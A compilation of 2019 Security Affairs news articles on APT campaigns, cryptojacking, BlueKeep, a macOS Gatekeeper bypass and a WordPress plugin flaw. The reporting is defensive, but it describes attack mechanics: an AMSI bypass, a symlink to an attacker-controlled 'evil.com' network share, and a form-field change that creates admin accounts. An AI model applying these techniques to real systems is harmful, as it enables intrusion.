Security Affairs newsletter Round 216 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

https://www.surveymonkey.com/r/EUBloggerAwards2018

Police seized Bestmixer, the mixing service washed at least $200 million in a year
Remarks on NATO and its approach to the cyber offensive
Sectigo says that most of certificates reported by Chronicle analysis were already revoked
BlueKeep scans observed from exclusively Tor exit nodes
Crooks leverages .htaccess injector on Joomla and WordPress sites for malicious redirects
First American Financial exposed 16 years worth of personal and financial documents
Hacker breached Perceptics, a US maker of license plate readers
APT10 is back with two new loaders and new versions of known payloads
DuckDuckGo Address Bar Spoofing
Internet scans found nearly one million systems vulnerable to BlueKeep
Shade Ransomware is very active outside of Russia and targets more English-speaking victims
Siemens Healthineers medical products vulnerable to Windows BlueKeep flaw
All Docker versions affected by an unpatched race condition issue
Google white hat hacker found code execution flaw in Notepad
HawkEye Keylogger is involved in attacks against business users
News aggregator Flipboard disclosed a data breach
TA505 is expanding its operations
Using Public Wi-Fi? Your data can be hacked easily! Heres How…
Checkers double drive-thru restaurants chain discloses card breach
Convert Plus WordPress plugin flaw allows hackers to create Admin accounts
Emissary Panda APT group hit Government Organizations in the Middle East
Nansh0u campaign already infected 50,000 MS-SQL and PHPMyAdmin Servers
VPNpro research: this Chinese-linked company secretly owns 10 VPNs with 86 million installs
0patch released micropatch for BearLPE Zero-Day flaw in Windows 10 Task Scheduler
HiddenWasp, a sophisticated Linux malware borroes from Mirai and Azazel
Microsoft warns for the second time of applying BlueKeep patch
Security expert shows how to bypass macOS Gatekeeper
The Pyramid Hotel Group data leak exposes 85GB of security logs of major hotel chains
Apple updates address SQLite, WebKit issues in iTunes and iCloud for Windows
Cryptojacking campaign uses Shodan to scan for Docker hosts to hack
GandCrab operators are shutting down their operations
Russian military plans to replace Windows with Astra Linux



Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 216 – News of the week appeared first on Security Affairs.

ESET analyzes Turla APT’s usage of weaponized PowerShell

Turla, the Russia-linked cyberespionage group, is weaponizing PowerShell scripts and is using them in attacks against EU diplomats.

Turla (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON), the Russia-linked APT group, is using weaponized PowerShell scripts in attacks aimed at EU diplomats.

Turla group has been active since at least 2007 targeting government organizations and private businesses.

The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

Turla is back, in a recent wave of attacks, the cyberspies targeted diplomatic entities in Eastern Europe.

“To confound detection, its operators recently started using PowerShell scripts that provide direct, in-memory loading and execution of malware executables and libraries. This allows them to bypass detection that can trigger when a malicious executable is dropped on disk.” reads the report published by ESET.

The PowerShell scripts used by Turla in recent attacks allow direct, in-memory loading and execution of malicious executables and libraries avoiding detection.

Turla first used PowerShell in 2018, at the time experts from Kaspersky Labs collected evidence that demonstrated overlaps between the activity of Russian APT groups Turla and Sofacy. 

Turla attacks

Kaspersky Lab said the APT was experimenting with PowerShell in-memory loads to bypass security protections, at the time the loader used by the cyberspies was based on the legitimate PoshSec-Mod software. Anyway, experts believe that due to the presence of bugs in the code it would often crash.

ESET believes that now the problems have been solved and the Turla threat actors leverage the PowerShell scripts to load an array of malware.

“The PowerShell scripts are not simple droppers; they persist on the system as they regularly load into memory only the embedded executables.” continues the report.

We have seen Turla operators use two persistence methods:

  • A Windows Management Instrumentation (WMI) event subscription
  • Alteration of the PowerShell profile (profile.ps1 file).”

When the persistence is implemented through WMI, attackers create two WMI event filters and two WMI event consumers. The consumers are command lines launching base64-encoded PowerShell commands that load a PowerShell script stored in the Windows registry.

The second method used by the group consists of altering the PowerShell profile that is a script that runs when PowerShell starts.

In both cases the decryption of payloads stored in the registry is done using the 3DES algorithm. Once decrypted, a PowerShell reflective loader then comes into action.

“The payload decrypted at the previous step is a PowerShell reflective loader. It is based on the script Invoke-ReflectivePEInjection.ps1 from the same PowerSploit framework” reads the analysis.

“The executable is hardcoded in the script and is loaded directly into the memory of a randomly chosen process that is already running on the system,”

Attackers avoid targeting processes that could be specifically referred as legitimate defense solutions, such as the Kaspersky anti-virus protection software.

In some samples, Turla attackers have modified the PowerShell script in order to bypass the Antimalware Scan Interface (AMSI) implemented by Windows.

“This is an interface allowing any Windows application to integrate with the installed antimalware product. It is particularly useful for PowerShell and macros.” continues the report.

“They did not find a new bypass but re-used a technique presented at Black Hat Asia 2018 in the talk The Rise and Fall of AMSI. It consists of the in-memory patching of the beginning of the function AmsiScanBuffer in the library amsi.dll.”

The attackers are also able to modify the PowerShell script, in particular, the AmsiScanBuffer in a way that the antimalware product will not receive the buffer, which prevents any scanning.

The PowerShell loader is used to lauch malware, one of these malicious codes is a backdoor based on the RPC protocol.

Turla also has also a lightweight PowerShell backdoor in its arsenal, tracked as PowerStallion it uses cloud storage as C2 server.

A few weeks ago, ESET researchers discovered a Turla’s backdoor tracked as LightNeuron, that has been specifically developed to hijack Microsoft Exchange mail servers.

ESET confirmed that the PowerShell scripts have been used involved in campaigns aimed at political targets in Eastern Europe. According to the researchers the same scripts are also used globally against other targets in Western Europe and the Middle East.

“Finally, the usage of open-source tools does not mean Turla has stopped using its custom tools. The payloads delivered by the PowerShell scripts, the RPC backdoor and PowerStallion, are actually very customized. Our recent analysis of Turla LightNeuron is additional proof that this group is still developing complex, custom malware.” concludes the report.

ESET report includes technical details and IoCs associated with recent attacks.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Turla, hacking)

“”

The post ESET analyzes Turla APT’s usage of weaponized PowerShell appeared first on Security Affairs.

Apple updates address SQLite, WebKit issues in iTunes and iCloud for Windows

Apple released security updates for Windows versions of iTunes and iCloud, to address recently disclosed SQLite and WebKit security flaws.

Apple released security updates to address recently disclosed SQLite and WebKit security vulnerabilities affecting Windows versions of iTunes and iCloud.

Apple released iTunes for Windows 12.9.5 that addresses a total of 25 flaws, four SQLite issues and 21 vulnerabilities in WebKit.

Apple addressed the SQLite vulnerabilities tracked as CVE-2019-8577 and CVE-2019-8602 that could be exploited by an application to gain elevated privileges.

Another SQLite bug tracked as CVE-2019-8600, is a memory corruption vulnerability that could be exploited to execute arbitrary code by sendind maliciously crafted SQL query to the vulnerable install.

The fourth SQLite flaw, tracked as CVE-2019-8598, is an input validation issue that could allow an application to read restricted memory.

All the SQLite issues were reported by Omer Gull from Checkpoint Research.

The CVE-2019-8607 flaw in WebKit is an out-of-bounds read that could lead to the disclosure of process memory when processing maliciously crafted web content.  The flaw was reported by Junho Jang and Hanul Choi of LINE Security Team.

The other flaws in WebKit addressed by Apple could lead to arbitrary code execution during the processing of maliciously crafted web content.  

The security advisory published by Apple is available here.

The tech giant also released iCloud for Windows 7.12 to address all these security issues. 

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Apple, iCloud, iTunes)

The post Apple updates address SQLite, WebKit issues in iTunes and iCloud for Windows appeared first on Security Affairs.

Cryptojacking campaign uses Shodan to scan for Docker hosts to hack

A new cryptojacking campaign was spotted by experts at Trend Micro, crooks are using Shodan to scan for Docker hosts with exposed APIs.

Threat actors are using the popular Shodan search engine to find Docker hosts and abuse them in a crypojacking campaign. Attackers leverage self-propagating Docker images infected with Monero miners and scripts that use of Shodan to find other vulnerable installs and compromise them.

The experts discovered the attacks after they have set up a machine that simulated a Docker host with an exposed API.

“We discovered that the images are first deployed using a script (ubu.sh, detected as PUA.Linux.XMRMiner.AA.component) that checks hosts with publicly exposed APIs. It then uses Docker commands (POST /containers/create) to remotely create the malicious container. This script also starts an SSH daemon inside the container for remote communication.” reads the analysis published by Trend Micro.

“The script then calls a Monero coin-mining binary, darwin (detected as PUA.Linux.XMRMiner.AA), to run in the background. As with all cryptocurrency miners, it uses the resources of the host system to mine cryptocurrency (Monero in this instance) without the owner’s knowledge.”

docker cryptojacking

The scripts used by the hackers in this campaign scan for vulnerable hosts via Shodan. They scan for hosts with the 2375 port open and deploy more infected containers to the host after brute-forcing them.

Exposed APIs allow the attacker to execute commands on the Docker hosts which allow them to manage containers, and of course, deploy infected images from a Docker Hub repository under their control.

The analysis of the logs and traffic data coming to and from the honeypot, revealed that the attackers used a container from a public Docker Hub repository named zoolu2. Researchers discovered that the repository contained nine images comprised of custom-made shells, Python scripts, configuration files, as well as Shodan and cryptocurrency-mining binaries.

The good news is that Docker discovered the same repository independently and took it offline.

The same threat actors used also another Docker Hub repository, associated with the ‘marumira‘ account, in previous attacks. Once this account was deactivated threat actors moved to zoolu2.

While the attackers launch a scanning process for Docker hosts to compromise, a custom built Monero coin-mining binary is executed in the background.

“An interesting characteristic of the attack is that it uses a cryptocurrency miner that it is being built from scratch instead of an existing one.” continues the report.

Every time an exposed Docker host is discovered, it is added to a list (iplist.txt file), then attackers sort it for unique IPs. It also checks if the Docker host already runs a cryptocurrency-mining container and delete it if it exists.

The above list is sent to the C2 servers to deploy additional containers to other exposed hosts based on the IP list.

Attacks like the one detected by Trend Micro are not a novelty in the threat landscape, a similar campaign was also spotted by researchers from Imperva in early March.

The same malicious campaign was also analyzed by the Alibaba Cloud Security team that tracked it as Xulu.

“These threats are often successful, not only due to the exploitation of flaws and vulnerabilities in the container software but also due to misconfiguration, which remains a constant challenge for organizations. In this case, the hosts that have exposed APIs are not just victims of cryptocurrency-mining operations — they also contribute further to the distribution of the infected containers.” concludes Trend Micro.

“Unwanted cryptocurrency-mining activity can lead to additional resource load for the targets. In this example, if the Docker host is running on internal infrastructure, other hosts can also suffer. On the other hand, if the Docker host is using a cloud service provider, the organization can accrue additional charges due to the higher resource usage.”


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Docker, hacking)

The post Cryptojacking campaign uses Shodan to scan for Docker hosts to hack appeared first on Security Affairs.

0patch released micropatch for BearLPE Zero-Day flaw in Windows 10 Task Scheduler

Researchers at 0patch released a temporary micropatch for the unpatched BearLPE local privilege escalation zero-day flaw in Windows 10.

Experts at 0patch released a micropatch to temporary fix a still-unpatched local privilege escalation on systems without rebooting them.

The zero-day vulnerability, dubbed BearLPE, was recently disclosed by the security researcher SandboxEscaper

The following video shows how the micropatch, composed of just five instructions, works on a vulnerable machine:

The exploit published by the expert triggers the flaw that resides in the Task Scheduler of Windows 10.

SandboxEscaper discovered that even starting with limited privileges it is possible to get SYSTEM rights by invoking a specific function. SandboxEscaper published a video PoC of the Windows zero-day that shows how to trigger it on Windows x86.

Will Dormann, vulnerability analyst at CERT/CC, confirmed that the Windows zero-day works on a fully patched (May 2019) Windows 10 x86 system.

According to Will Dormann, a vulnerability analyst at CERT/CC, the exploit is 100% reliable on x86 systems and needs to be recompiled for x64 machines.

“When you run Windows XP schtasks.exe on Windows 10, legacy RPC functions are called – which in turn call the current ones, such as SchRpcSetSecurity,” explained 0patch co-founder Mitja Kolsek.ù

The micropatch prevents changing the set of permissions a normal user has over a system file.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – micropatch, BearLPE)


The post 0patch released micropatch for BearLPE Zero-Day flaw in Windows 10 Task Scheduler appeared first on Security Affairs.

Microsoft warns for the second time of applying BlueKeep patch

Microsoft issued a new warning for users to update their systems to address the remote code execution vulnerability dubbed BlueKeep.

Microsoft issued a new warning for users of older Windows OS versions to update their systems in order to patch the remote code execution vulnerability dubbed BlueKeep.

The vulnerability, tracked as CVE-2019-0708, impacts the Windows Remote Desktop Services (RDS) and was addressed by Microsoft with May 2019 Patch Tuesday updates. BlueKeep is a wormable flaw that can be exploited by malware authors to create malicious code with WannaCry capabilities.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

Many security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. Windows 7 and Server 2008 users can prevent unauthenticated attacks by enabling Network Level Authentication (NLA), and the threat can also be mitigated by blocking TCP port 3389.

Now Microsoft is warning again companies to patch older versions of Windows to avoid the exploitation of the flaw. Security experts fear a new massive attack that could affect millions of computers worldwide running still unpatched systems.

The availability of explot codes in the wild poses a severe risk for tne users. Experts at the SANS Institute observed two partial exploits that are publicly available. Chaouki Bekrar, the founder of zero-day broker firm Zerodium, explained that the flaw can be exploited remotely by an unauthenticated user to gain access to a device with SYSTEM privileges. Researchers at McAfee developed a PoC exploit that could be exploited to get remote code execution.

Other experts also announced to have successfully developed exploits for BlueKeep, including KasperskyCheck Point, and MalwareTech.

Recently, the popular expert Robert Graham has scanned the Internet for vulnerable systems. He discovered more than 923,000 potentially vulnerable devices using the masscan port scanner and a modified version of rdpscan,  

“Microsoft is confident that an exploit exists for this vulnerability, and if recent reports are accurate, nearly one million computers connected directly to the internet are still vulnerable to CVE-2019-0708. Many more within corporate networks may also be vulnerable. It only takes one vulnerable computer connected to the internet to provide a potential gateway into these corporate networks, where advanced malware could spread, infecting computers across the enterprise.” reads the advisory published by Simon Pope, Director of Incident Response, Microsoft Security Response Center (MSRC). “This scenario could be even worse for those who have not kept their internal systems updated with the latest fixes, as any future malware may also attempt further exploitation of vulnerabilities that have already been fixed.”

Even if there has been no sign of attacks exploiting the flaw in the wild Microsoft recommends updating the vulnerable Windows versions as soon as possible. 

“It’s been only two weeks since the fix was released and there has been no sign of a worm yet. This does not mean that we’re out of the woods. If we look at the events leading up to the start of the WannaCry attacks, they serve to inform the risks of not applying fixes for this vulnerability in a timely manner.” concludes the advisory.

“Our recommendation remains the same. We strongly advise that all affected systems should be updated as soon as possible.”

Microsoft also pointed out that workstations not connected to the Internet are also exposed to the risk of a hack.



If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – BlueKeep, hacking)

The post Microsoft warns for the second time of applying BlueKeep patch appeared first on Security Affairs.

Security expert shows how to bypass macOS Gatekeeper

A security researcher demonstrated how to bypass the Apple macOS Gatekeeper by leveraging trust in network shares.

The Italian security researcher Filippo Cavallarin demonstrated how to bypass the macOS Gatekeeper by leveraging trust in network shares.

The Apple Gatekeeper is designed to protect OS X users by performing a number of checks before allowing an App to run. In fact, you will not be able to execute code that wasn’t signed by an Apple developer, you will not be able to run apps that weren’t downloaded from Apple’s store if the device is not jailbreaked of course.

Filippo Cavallarin demonstrated how to bypass Gatekeeper and execute untrusted code without user explicit permission and any warning to the victims.

Gatekeeper considers both external drives and network shares as safe locations, this means that any application in these locations could run without asking for the user’s consent.

The attacker would need to leverage two legitimate features implemented in macOS, the automount (aka autofs) and the lack of specific checks.

“As per-design, Gatekeeper considers both external drives and network shares as safe locations and it allows any application they contain to run.” wrote the expert.”By combining this design with two legitimate features of MacOS X, it will result in the complete deceivement of the intended behaviour.” 

The autofs feature allows a user to automatically mount a network share by accessing a “special” path, in this specific case any path beginning with “/net/” (i.e. /net/evil-attacker.com/sharedfolder/).

The second feature that was exploited to include within ZIP archives symbolic links pointing to arbitrary locations, in this case, automount endpoints.

Cavallarin discovered that the software responsible for decompressing the ZIP archives does not perform any check on the symlinks.

An attacker can create a ZIP file containing a symbolic link to an automount endpoint under their control and send it to the victim. The attack scenario sees the victim downloading the archive and follows the symlink, they are redirected to the location controlled by the attacker that is also trusted by Gatekeeper. 

“To better understand how this exploit works, let’s consider the following scenario:
An attacker crafts a zip file containing a symbolic link to an automount endpoint she/he controls (ex Documents -> /net/evil.com/Documents) and sends it to the victim. The victim downloads the malicious archive, extracts it and follows the symlink.” continues the expert.

“Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path from titlebar) makes this tecnique very effective and hard to spot.”

Below a video PoC of the attack:

The expert suggests as workaround to disable automount feature with the following procedure:

  1. Edit /etc/auto_master as root
  2. Comment the line beginning with ‘/net’
  3. Reboot

Cavallarin reported his findings to Apple on February 22, 2019, the tech giant likely addressed it on May 15, 2019. 

“The vendor has been contacted on February 22th 2019 and it’s aware of this issue.” concludes the researcher. “This issue was supposed to be addressed, according to the vendor, on May 15th 2019 but Apple started dropping my emails. Since Apple is aware of my 90 days disclosure deadline, I make this information public. ”

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Gatekeeper, hacking)

The post Security expert shows how to bypass macOS Gatekeeper appeared first on Security Affairs.

The Pyramid Hotel Group data leak exposes 85GB of security logs of major hotel chains

vpnMentor researches have recently discovered that hotel brands managed by The Pyramid Hotel Group have suffered a data leak.

vpnMentor experts have discovered that hotel brands managed by The Pyramid Hotel Group, including Marriott, have suffered a data leak,

vpnMentor’s research team discovered the unprotected server through port scanning to examine known IP blocks.

Researchers discovered 85.4GB of security audit logs, the exposed data also include monitoring and alerts, reported system errors, misconfiguration, policy violations, potential attempted malicious breaches, and other cybersecurity events. Unsecured data also include personally identifying information (PII) of employees.

Exposed data is date back to April 19, 2019, likely the date of the system setup or reconfiguration that is the root cause of the leak.

The unsecured server exposed audit logs generated by Wazuh, an open-source intrusion detection system used by the company.

“The Pyramid Hotel Group utilizes Wazuh – an open source intrusion detection system – on an unsecured server that is leaking information regarding their operating systems, security policies, internal networks, and application logs.” reads the post published by vpnMentor.

Pyramid Hotel Group

The Pyramid Hotel Group manages hospitality and resort properties in the US, Hawaii, the Caribbean, Ireland, and the UK, it includes locations of several brands such as Marriott, Sheraton, Plaza, Hilton Hotel and other independent hotels.

Data leaked by the company could be used by attackers to gather information about hotels’ network and security measures implemented to protect them. This information could be used by hackers in later attacks.

Below the timeline of discovery:

DATEEVENT
5/27/19Breach discovered by vpnMentor Research team
5/28/19Informed PHG of breach
5/28/19Received acknowledgement from PHG
5/29/19Data leak closed. Problem resolved.

Recently vpnMentor experts discovered an unprotected database impacting up to 65% of US households.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Pyramid Hotel Group, data leak)

The post The Pyramid Hotel Group data leak exposes 85GB of security logs of major hotel chains appeared first on Security Affairs.

Convert Plus WordPress plugin flaw allows hackers to create Admin accounts

The WordPress plugin Convert Plus is affected by a critical flaw that could be exploited by an unauthenticated attacker to create accounts with administrator privileges.

The WordPress plugin Convert Plus is affected by a critical vulnerability that could be exploited by an unauthenticated attacker to create accounts with administrator privileges.

Convert Plus plugin

A vulnerability ties with the lack of filtering when processing a new user subscription via a form implemented by the Convert Plus plugin that already has more than 100,000 active installations,

Convert Plus aims at generating more subscribers and sales conversions using popups, header & footer bars, slide-in forms, sidebar widgets, in-line forms, and social buttons.

New subscribers can use a specific form that allows them to define the role they want, of course, administrator accounts are not in the list of possible options og a drop-down menu.

Experts at Defiant discovered that Convert Plus plugin includes an administrator role in a hidden field called “cp_set_user.” Experts pointed out that the value for this field could be supplied by the same HTTP request as the rest of the subscription entry, and users can modify it.

“However, in vulnerable versions of the plugin, this intended user role wasn’t fetched from the database on submission. Instead, this setting was reflected in a hidden field on the plugin’s forms called cp_set_user.” reads the analysis by the experts. “Because this value is supplied by the same HTTP request as the rest of the subscription entry, it can be modified by the user.”

It could very easy for an attacker to submit a subscription form and modify the value of the “cp_set_user” by setting the “administrator” value to create a new admin user.

“This code calls the plugin’s function cp_add_new_user_role with the role provided in the AJAX request, which then handles the process of creating the user as directed.” continues the analysis.

“Since no filtering is applied when this new subscription is processed, if an attacker submits a subscription form and changes the value of cp_set_user to “administrator”, the plugin will create an administrator user associated with the given email address.”

The hack allows to create a new admin account with a randomized password, but it is not a problem because the attacker can use a classic password reset procedure to change the password too.

The vulnerability affects all versions of the Convert Plus plugin up to 3.4.2., it is essential for administrators to update their install to the version 3.4.3.

Defiant experts also published a video PoC for the exploitation of the issue.

Below the disclosure timeline of the vulnerability:

  • May 24 – Vulnerability discovered. Notified developers privately.
  • May 28 – Patch released by developers. Firewall rule released for Premium users.
  • June 27 – Planned date for firewall rule’s release to Free users.



If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Convert Plus plugin, hacking)

The post Convert Plus WordPress plugin flaw allows hackers to create Admin accounts appeared first on Security Affairs.

VPNpro research: this Chinese-linked company secretly owns 10 VPNs with 86 million installs

Innovative Connecting is actually a Chinese company that secretly owns 10 VPN products with a total of 86 million installs under its belt.

Recent research by the cybersecurity experts at VPNpro shows that the popular mobile VPN developer Innovative Connecting is actually a Chinese company that secretly owns 10 VPN products with a total of 86 million installs under its belt.

The study also revealed that two of those VPN products are under its other developer name, Lemon Clove, and another two by Autumn Breeze 2018.

Interestingly, most of the popular mobile-only VPNs that VPNpro analyzed are actually Chinese (run by Chinese nationals or actually located in China). Any data that is held in mainland China is wide open to access by Chinese authorities, confirming US Senators’ recent fears of American data falling into Chinese or Russian hands.

Innovative Connecting VPNs products

Innovative Connecting owns the following 10 VPN products:

  1. VPN Master – Free Proxy
  2. VPN Proxy Master (Pro)
  3. VPN Proxy Master (Lite)
  4. Turbo VPN
  5. Unlimited Free VPN
  6. HOT VPN
  7. Snap VPN
  8. VPN Robot
  9. VPN Sofast
  10. Turbo VPN Private Browser
VPNs

Source: VPNpro

What is the relationship between Innovative Connecting, Lemon Clove and ALL Connected?

VPNpro’s research reveals that there is a clear relationship between these three companies. Innovative Connecting has more than a strong business relationship with Lemon Clove, which creates the popular Snap VPN and VPN Robot apps.

Lemon Clove and Innovative Connecting share the same secretary, Loo Ping Yoo, and key addresses. Both Lemon Clove’s website and Innovative Connecting’s website are the same, with only small changes in text.

If you search VPN Proxy Master on Apple’s App Store, you can see the developer name appears as ALL Connected, while Innovative Connecting listed as the developer on Google Play.

ALL Connected’s Turbo and Master VPN are on similar Cloudfront domains that link to Innovative Connecting. The App Store policy for VPN Master (developed by Innovative Connecting) is hosted on ALL Connected’s domain. All the policies for these VPN apps have the exact same broken English and typos.

Innovative Connecting’s Director seems to be Danny Chen, the well-known Chinese entrepreneur and CEO behind Linksure. Beyond that, the researchers discovered that the email address used to register turbovpn.co (developed by Innovative Connecting) also registered lemonclove.net, vpnsnap.com, and many others.

VPNs 2

Source: VPNpro

Why does it matter if a company owns multiple VPN products?

There is nothing wrong with owning multiple VPN brands – but there must be transparency between the company and its users. Trust is the most important factor for most users of VPN services. Other than this, there are two further crucial issues

1. Privacy

In a recent US survey, 95% of internet users said they were either somewhat concerned or very concerned about their privacy. However, if VPNs are actually located in a 5/9/14 Eyes country, which are normally high-surveillance countries, or in a repressive country like China or Russia, users’ data is most likely already in those governments’ hands.

2. Security

If a VPN’s parent company is untrustworthy, including having weak security or actively engaged in malicious activities, it can be a big problem. This can lead to users’ data being stolen and sold on the black market, or even having their computers hacked into.

Bottom line

There are thousands of VPN companies out there, and unfortunately many of them have weak security and privacy features, or are outright malicious in wanting to steal or sell user data.

To help you find a trustworthy VPN, you should follow these steps below:

  • carefully read the privacy policy of a VPN provider
  • read in-depth reviews of a VPN company on different platforms
  • ask for a recommendations on different communities and see their views
  • check if the company is GDPR compliant
  • read their privacy features
  • check if they have had any scandals or breaches

With the right homework, you can find a trustworthy VPN that actually helps safeguard your online activity.


About The Author: Susan Alexandra is is a cybersecurity and privacy enthusiast. She is a small business owner, traveler and investor of cryptocurrencies. Susan’s inbox is open for new ideas and stories, you can share the story ideas to susanalexandra67(at)gmail(dot)com


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – VPNs, privacy)

The post VPNpro research: this Chinese-linked company secretly owns 10 VPNs with 86 million installs appeared first on Security Affairs.

Emissary Panda APT group hit Government Organizations in the Middle East

Chinese Cyber-Spies Target Government Organizations in Middle East

Chinese APT group Emissary Panda has been targeting government organizations in two different countries in the Middle East.

Experts at Palo Alto Networks reported that the Chinese APT group Emissary Panda (aka APT27, TG-3390, Bronze Union, and Lucky Mouse) has been targeting government organizations in two different countries in the Middle East.

The Emissary Panda APT group has been active since 2010, targeted organizations worldwide, including U.S. defense contractors, financial services firms, and a national data center in Central Asia.

Emissary Panda Espionage-r3d1-1024x512

The group was involved in cyber espionage campaigns aimed at new generation weapons and in surveillance activities on dissidents and other civilian groups. 

The cyber espionage group leverage both readily available tools and custom malware in their operations, many tools are available for years, but in recent attacks, their code was updated.

In April 2019, the group targeted organizations of two different countries in the Middle East. Hackers hit webservers to install of webshells on SharePoint servers, threat actors leveraged the CVE-2019-0604 vulnerability to compromise SharePoint servers. 

Once compromised the network, attackers will upload a variety of tools to perform additional activities, including dumping credentials, and locating and pivoting to additional systems on the network.

Experts pointed out that attackers used tools to scan the network for systems vulnerable to CVE-2017-0144, the flaw exploited by the NSA-linked EternalBlue exploit.

The campaign appears related to attacks exploiting CVE-2019-0604 reported by the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security. The report by the Saudi Cyber Security Centre suggests threat actors are primarily targeting organizations within the kingdom. The Canadian Cyber Security Centre reported similar attacks aimed at delivering the China Chopper web-shell to ensure persistence in the target networks.

“the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks. We also found the China Chopper webshell on the SharePoint servers, which has also been used by the Emissary Panda threat group.” states the report published by PaloAlto Networks.a

PaloAlto experts observed between April 1 and April 16, the threat actors-using webshells to upload 24 unique executables on three SharePoint servers hosted by two different government organizations. Experts noticed that the same tools were uploaded across the three webshells, suggesting the involvement of the same attacker. 

The longest activity involving one of the three webshells was observed on April 16, 2019.

The list of the tools uploaded by cyberspies included legitimate applications such as cURL, post-exploitation tools like Mimikatz, tools to scan for and exploit potential vulnerabilities in the target network, and custom backdoors such as HyperBro, which was used by Emissary Panda in the past. 

One of the webshells used by the attackers is a variant of the Antak webshell, other webshells appear related to the China Chopper webshell.

“We were able to gather one of the webshells with which we saw the actor interacting, specifically the error2.aspx file listed above. The error2.aspx file (SHA256: 006569f0a7e501e58fe15a4323eedc08f9865239131b28dc5f95f750b4767b38) is a variant of the Antak webshell, which is part of a tool created for red teaming called Nishang. ” continues the report.

Cyber spies also uncovered the use of additional sideloaded DLLs in this campaign. 

“The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East, which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604,” Palo Alto Networks concludes. 

“Once the adversary established a foothold on the targeted network, they used China Chopper and other webshells to upload additional tools to the SharePoint server to dump credentials, perform network reconnaissance and pivot to other systems.  “

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – cyberespionage, Emissary Panda)

The post Emissary Panda APT group hit Government Organizations in the Middle East appeared first on Security Affairs.

Nansh0u campaign already infected 50,000 MS-SQL and PHPMyAdmin Servers

Guardicore Labs uncovered a widespread cryptojacking campaign tracked as Nansh0u and aimed at Windows MS-SQL and PHPMyAdmin servers.

Security experts at Guardicore Labs uncovered a widespread cryptojacking campaign leveraging a malware dubbed Nansh0u. The malicious code aimed at Windows MS-SQL and PHPMyAdmin servers worldwide.

According to the experts, the malicious campaign is being carried out by a Chinese APT group.

According to the experts Nansh0u malware has already infected nearly 50,000 servers worldwide. Threat actors also delivered a sophisticated kernel-mode rootkit on compromised systems to prevent the malware from being terminated.

“During the past two months, the Guardicore Labs team has been closely following a China-based campaign which aimed to infect Windows MS-SQL and PHPMyAdmin servers worldwide.” reads the report published by Guardicore.

“Breached machines include over 50,000 servers belonging to companies in the healthcare, telecommunications, media and IT sectors. Once compromised, the targeted servers were infected with malicious payloads. These, in turn, dropped a crypto-miner and installed a sophisticated kernel-mode rootkit to prevent the malware from being terminated.”

The attacks date back to February 26, experts observed over seven hundred new victims per day. Researchers discovered 20 versions of malicious payloads, with new payloads created at least once a week and immediately involved in the campaign after their creation time.

nansh0u infections

Threat actors use to launch brute-force attacks against previously identified Windows MS-SQL and PHPMyAdmin servers that are exposed online.

Once successfully logged in with administrative privileges, threat actors execute a sequence of MS-SQL commands that allow them to download malicious payload from a remote file server and execute it with SYSTEM privileges.

Attackers used two exploits tracked as apexp.exe and apexp2012.exe that trigger the privilege escalation vulnerability CVE-2014-4113. The exploits allow running any executable with SYSTEM privileges.

“Using this Windows privilege, the attacking exploit injects code into the winlogon process. The injected code creates a new process which inherits winlogon’s SYSTEMprivileges, providing equivalent permissions as the prior version.” continues the analysis.

The payloads used in this campaign were droppers used to deliver a cryptocurrency miner to mine TurtleCoin cryptocurrency.

Experts observed many payloads dropping a kernel-mode driver using ransom file names and placed them in AppData/Local/Temp. The compile time for these files suggests that it had been created in 2016, but most AV engines still not detect them as malicious.

The driver had a digital signature issued by the top Certificate Authority Verisign

We can confidently say that this campaign has been operated by Chinese attackers.” concludes the report.

We base this hypothesis on the following observations:

  • The attacker chose to write their tools with EPL, a Chinese-based programming language.
  • Some of the file servers deployed for this campaign are HFSs in Chinese.
  • Many log files and binaries on the servers included Chinese strings, such as 结果-去重复 (“duplicates removed”) in logs containing breached machines, or 开始 (“start”) in the name of the script initiating port scans.”

